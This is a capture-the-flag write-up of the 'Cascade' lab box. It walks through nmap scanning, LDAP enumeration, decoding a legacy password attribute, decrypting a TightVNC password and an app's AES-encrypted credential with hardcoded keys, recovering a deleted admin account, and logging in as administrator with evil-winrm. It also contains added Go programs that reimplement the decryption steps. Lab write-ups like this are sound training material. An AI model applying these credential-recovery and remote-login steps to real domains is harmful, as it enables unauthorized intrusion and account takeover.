Port scanning

┌──(mikannse㉿kali)-[~/Desktop/Cascade]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 11:36 CST
Nmap scan report for 10.10.10.182
Host is up (0.079s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
┌──(mikannse㉿kali)-[~/Desktop/Cascade]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49165 10.10.10.182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 11:38 CST
Nmap scan report for 10.10.10.182
Host is up (0.072s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-14 03:27:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-09-14T03:28:55
|_ start_date: 2024-09-14T03:21:59
|_clock-skew: -10m27s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.62 seconds

Enum

Anonymous access to the SMB shares is refused, so enumerate users instead

┌──(mikannse㉿kali)-[~/tools/domain/windapsearch]
└─$ python windapsearch.py -d cascade.local --dc-ip 10.10.10.182 -U >~/HTB/cascade/ldap_result
┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ cat ldap_result |grep userPrincipalName |awk -F ' ' '{print $2}' |cut -d '@' -f1 >username

That gives a username wordlist. Running GetNPUsers and weak-password guessing against it got nowhere, so back to the LDAP enumeration for a closer look

The r.thompson user has an unusual attribute:

cascadeLegacyPwd: clk0bjVldmE=, which base64-decodes to: rY4n5eva
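As an added example (not from the writeup), the same finding turned into an audit check in Go: it parses a windapsearch-style dump into entries and flags every cascadeLegacyPwd attribute whose value base64-decodes to printable ASCII. The sample dump is constructed; only the two attribute values are taken from the output above.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// Constructed sample in windapsearch's LDIF-like output format; only the two attribute values come from the writeup.
const sampleLDAP = `dn: CN=r.thompson,OU=Users,DC=cascade,DC=local
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=s.smith,OU=Users,DC=cascade,DC=local
userPrincipalName: s.smith@cascade.local
`

// parseEntries splits the dump into one attribute map per object (blank line separated, "name: value" attributes).
func parseEntries(dump string) []map[string]string {
	var entries []map[string]string
	cur := map[string]string{}
	for _, line := range strings.Split(dump+"\n", "\n") {
		if name, value, ok := strings.Cut(line, ": "); ok {
			cur[name] = value
		} else if strings.TrimSpace(line) == "" && len(cur) > 0 {
			entries, cur = append(entries, cur), map[string]string{}
		}
	}
	return entries
}

// legacyPasswords flags the non-standard cascadeLegacyPwd attribute and, when its value is base64 of
// printable ASCII, maps the account name (local part of userPrincipalName, as in the awk/cut pipeline) to it.
func legacyPasswords(entries []map[string]string) map[string]string {
	found := map[string]string{}
	for _, e := range entries {
		dec, err := base64.StdEncoding.DecodeString(e["cascadeLegacyPwd"])
		if err != nil || len(dec) == 0 || strings.IndexFunc(string(dec), func(r rune) bool { return r < 0x20 || r > 0x7e }) >= 0 {
			continue
		}
		found[strings.SplitN(e["userPrincipalName"], "@", 2)[0]] = string(dec)
	}
	return found
}

func main() {
	for user, pwd := range legacyPasswords(parseEntries(sampleLDAP)) {
		fmt.Printf("%s has a decodable cascadeLegacyPwd: %s\n", user, pwd)
	}
}
```

The same check applies to the deleted-object dump later in the writeup, since the attribute survives in the AD Recycle Bin.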

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ smbmap -H cascade.local -u r.thompson -p 'rY4n5eva'
<SNIP>
[+] IP: 10.10.10.182:445 Name: cascade.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share

Connect to the Data share and download it recursively; the IT directory contains a Meeting Note

We will be using a temporary account to perform all tasks related to the network migration; this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. The username is TempAdmin (the password is the same as the normal admin account password)

Foothold

Besides that, the s.smith user directory also contains a TightVNC registry dump

┌──(mikannse㉿kali)-[~/…/smb/IT/Temp/s.smith]
└─$ cat VNC\ Install.reg
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
<SNIP>
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
<SNIP>

Reference: https://github.com/billchaison/VNCDecrypt

┌──(mikannse㉿kali)-[~/…/smb/IT/Temp/s.smith]
└─$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d -provider legacy -provider default | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |sT333ve2|
00000008

Recovered credentials: s.smith:sT333ve2
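The openssl one-liner above as a small Go program, added here and not part of the writeup or of VNCDecrypt: it parses the Password line from the .reg dump and decrypts it with the fixed VNC DES key, zero IV and no padding, exactly as the openssl flags specify.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Fixed DES key VNC servers use to obfuscate stored passwords (the hex the writeup passes to openssl -K).
const vncFixedKey = "e84ad660c4721ae0"

// The relevant line as it appears in the dumped VNC Install.reg above.
const regLine = `"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f`

// regHexValue parses a .reg "name"=hex:aa,bb,... line into raw bytes.
func regHexValue(line string) ([]byte, error) {
	_, v, ok := strings.Cut(line, "=hex:")
	if !ok {
		return nil, fmt.Errorf("not a hex value: %q", line)
	}
	return hex.DecodeString(strings.ReplaceAll(strings.TrimSpace(v), ",", ""))
}

// decryptVNCPassword mirrors the openssl command: DES-CBC, zero IV, no padding,
// then trailing NUL bytes are dropped (VNC zero-pads passwords shorter than 8 bytes).
func decryptVNCPassword(ct []byte) (string, error) {
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ct), des.BlockSize)
	}
	key, _ := hex.DecodeString(vncFixedKey) // constant, known-good hex
	block, err := des.NewCipher(key)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, des.BlockSize)).CryptBlocks(pt, ct)
	return strings.TrimRight(string(pt), "\x00"), nil
}

func main() {
	ct, err := regHexValue(regLine)
	if err != nil {
		panic(err)
	}
	pw, err := decryptVNCPassword(ct)
	fmt.Println(pw, err)
}
```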

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u 's.smith' -p 'sT333ve2'

But it returned an error:

Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired

Error: Exiting with code 1

After a long time troubleshooting, it turned out to be a VPN problem; switching VPN servers a few times fixes it

Lateral movement

There is also a shortcut on the desktop that appears to run C:\Program Files (x86)\WinDirStat\windirstat.exe, which seems to be a disk usage viewer

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ smbclient //10.10.10.182/NETLOGON -U s.smith
Password for [WORKGROUP\s.smith]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jan 16 05:50:33 2020
.. D 0 Thu Jan 16 05:50:33 2020
MapAuditDrive.vbs A 258 Thu Jan 16 05:50:15 2020
MapDataDrive.vbs A 255 Thu Jan 16 05:51:03 2020

6553343 blocks of size 4096. 1625526 blocks available

There is also a NETLOGON share. The Netlogon service is a core service in a Windows Active Directory environment; it supports the logon process and related services for the computers in the domain

It contains two VBScript files, probably run automatically at user logon. Checking the group policy shows that MapAuditDrive.vbs is the one that runs

*Evil-WinRM* PS C:\Users\s.smith> Get-ADUser -identity s.smith -properties *

<SNIP>
pwdLastSet : 132247150854857364
SamAccountName : s.smith
sAMAccountType : 805306368
ScriptPath : MapAuditDrive.vbs
<SNIP>

Looking at the script, it maps the remote share \\CASC-DC1\Audit$ to the F: drive on the local computer

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ smbclient '//10.10.10.182/Audit$' -U s.smith
Password for [WORKGROUP\s.smith]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jan 30 02:01:26 2020
.. D 0 Thu Jan 30 02:01:26 2020
CascAudit.exe An 13312 Wed Jan 29 05:46:51 2020
CascCrypto.dll An 12288 Thu Jan 30 02:00:20 2020
DB D 0 Wed Jan 29 05:40:59 2020
RunAudit.bat A 45 Wed Jan 29 07:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 14:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 14:38:38 2019
x64 D 0 Mon Jan 27 06:25:27 2020
x86 D 0 Mon Jan 27 06:25:27 2020

6553343 blocks of size 4096. 1625516 blocks available

Download everything recursively. Running the .bat makes CascAudit.exe connect automatically to Audit.db in the DB directory. Searching for this executable suggests it is specific to this box; the DB is SQLite. Opening the DB file directly, the Ldap table contains

ArkSvc:BQO5l5Kj9MdErXx6Q6AGOw==, but this credential is not plain base64. So CascAudit.exe must be doing some special encryption/decryption. IDA does not seem able to reverse this .NET executable, so use https://github.com/dnSpy/dnSpy/releases/tag/v6.1.8

Locate CascAudit->Mainmodule

The key logic is as follows:

    sqliteConnection.Open();
    // Read the first row of the LDAP table: username, domain and the encrypted password
    using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
    {
        using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
        {
            sqliteDataReader.Read();
            str = Conversions.ToString(sqliteDataReader["Uname"]);
            str2 = Conversions.ToString(sqliteDataReader["Domain"]);
            string encryptedString = Conversions.ToString(sqliteDataReader["Pwd"]);
            try
            {
                // The decryption key is hardcoded in the binary
                password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error decrypting password: " + ex.Message);
                return;
            }
        }
    }
    sqliteConnection.Close();
} // end of the enclosing method (fragment)

It reads the LDAP username and password from the database, and the password is decrypted with Crypto.DecryptString. Locating that decryption function:

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public static string DecryptString(string EncryptedString, string Key)
{
    byte[] array = Convert.FromBase64String(EncryptedString);
    Aes aes = Aes.Create();   // AES-128-CBC; .NET defaults to PKCS7 padding
    aes.KeySize = 128;
    aes.BlockSize = 128;
    aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");   // hardcoded IV
    aes.Mode = CipherMode.CBC;
    aes.Key = Encoding.UTF8.GetBytes(Key);
    string @string;
    using (MemoryStream memoryStream = new MemoryStream(array))
    {
        using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
        {
            // Buffer is sized to the ciphertext; after padding removal the tail stays zero
            byte[] array2 = new byte[checked(array.Length - 1 + 1)];
            cryptoStream.Read(array2, 0, array2.Length);
            @string = Encoding.UTF8.GetString(array2);
        }
    }
    return @string;
}

So the password read from the database is base64-decoded and then AES-decrypted. With the IV and key already known, a CyberChef recipe recovers it

From_Base64('A-Za-z0-9%2B/%3D',true,false)AES_Decrypt({'option':'UTF8','string':'c4scadek3y654321'},{'option':'UTF8','string':'1tdyjCbY1Ix49842'},'CBC','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})&input=QlFPNWw1S2o5TWRFclh4NlE2QUdPdz09

Credentials obtained: ArkSvc:w3lc0meFr31nd, which can log in remotely
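A Go re-implementation of the decompiled DecryptString, added here (it is not the box's code or the CyberChef recipe): base64 decode, AES-128-CBC with the embedded key and IV, then the PKCS#7 unpadding that the .NET CryptoStream performs implicitly; unlike the original it reports an error instead of returning garbage when the padding does not check out.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// Key and IV exactly as hardcoded in the decompiled CascAudit / CascCrypto code.
const (
	cascKey = "c4scadek3y654321"
	cascIV  = "1tdyjCbY1Ix49842"
)

// Pwd column value for ArkSvc in Audit.db, as quoted in the writeup.
const arkSvcPwd = "BQO5l5Kj9MdErXx6Q6AGOw=="

// decryptString reimplements Crypto.DecryptString: base64 decode, AES-128-CBC with
// the embedded key/IV, then PKCS#7 unpadding (the .NET CryptoStream default the
// original relies on, which is why its over-sized output buffer ends in zeros).
func decryptString(encrypted, key string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(encrypted)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(cascIV)).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n < 1 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("bad PKCS#7 padding: wrong key or IV")
	}
	return string(pt[:len(pt)-n]), nil
}

func main() {
	pw, err := decryptString(arkSvcPwd, cascKey)
	fmt.Println(pw, err)
}
```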

Privilege escalation

There is a suspicious group, CASCADE\AD Recycle Bin, which can manage deleted user objects. That ties back to the TempAdmin account from the beginning

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

*Evil-WinRM* PS C:\Users\arksvc> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

<SNIP>
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
<SNIP>

This gives TempAdmin's password, baCT3r1aN00dles, which is the same as the administrator's, so connect as the administrator

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u 'administrator' -p 'baCT3r1aN00dles'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator

Closing thoughts

A very fun box. The enumeration at the start is fairly standard, then it is lateral movement back and forth. Reversing VNC and the database to recover credentials was very interesting